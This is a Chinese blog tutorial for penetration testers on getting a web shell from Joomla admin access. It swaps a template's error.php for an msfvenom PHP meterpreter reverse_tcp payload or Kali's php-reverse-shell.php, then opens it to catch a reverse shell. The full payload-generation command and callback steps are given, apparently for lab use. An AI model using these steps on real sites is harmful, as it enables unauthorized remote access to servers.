joomla后台模板getshell技巧是什么(layui后台模板)

文章前言

本篇文章我们主要介绍在获取到Joomla后台管理权限的情况下如何通过后台来实现Getshell的两种利用方式

GetShell

Metasploit

首先我们使用site_admin/123456登录Joomla后台

joomla后台模板getshell技巧是什么(layui后台模板)

在获取到Joomla的后台操作权限后我们可以通过在后台修改主题文件的方式来获取shell权限,这里我们随意选择一个主题

joomla后台模板getshell技巧是什么(layui后台模板)

选择查看模板文件的详细信息

joomla后台模板getshell技巧是什么(layui后台模板)

选择error.php文件

joomla后台模板getshell技巧是什么(layui后台模板)

然后使用msfvenom来生成要给php后门文件

#PHP后门文件msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

joomla后台模板getshell技巧是什么(layui后台模板)

然后使用我们之前在msfvenom中生成的webshell文件内容替换上面error.php文件内容

joomla后台模板getshell技巧是什么(layui后台模板)

保存后访问Beez3主题下的error.php文件便可成功的突破边界

http://192.168.204.137/joomla/templates/beez3/error.php

joomla后台模板getshell技巧是什么(layui后台模板)

随后在我们的MSF中获取到一个会话

joomla后台模板getshell技巧是什么(layui后台模板)

GetShell-2

这里我们介绍另外一种GetShell的方法,此方法和上面的方法类似,只是用的脚本不同,我们主要通过利用Kali自带的php-reverse-shell.php来实现反弹shell的目的,文件路径为/usr/share/webshells/php/php-reverse-shell.php

joomla后台模板getshell技巧是什么(layui后台模板)

随后我们直接修改模板文件的内容为上面的php-reverse-shell.php,同时修改文件中的反弹shell的地址和端口信息

joomla后台模板getshell技巧是什么(layui后台模板)

随后开启监听

joomla后台模板getshell技巧是什么(layui后台模板)

在WEB端访问上述的error.php文件

随后反弹shell回来

文末小结

此文仅作为Joomla后台GetShell的利用思路介绍,日常打靶机的时候Joomla遇到的可能多一些,正常的红队评估测试中外网少之又少,很少见到~

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34270.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月6日 上午11:16
下一篇 2024年4月6日 上午11:18

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注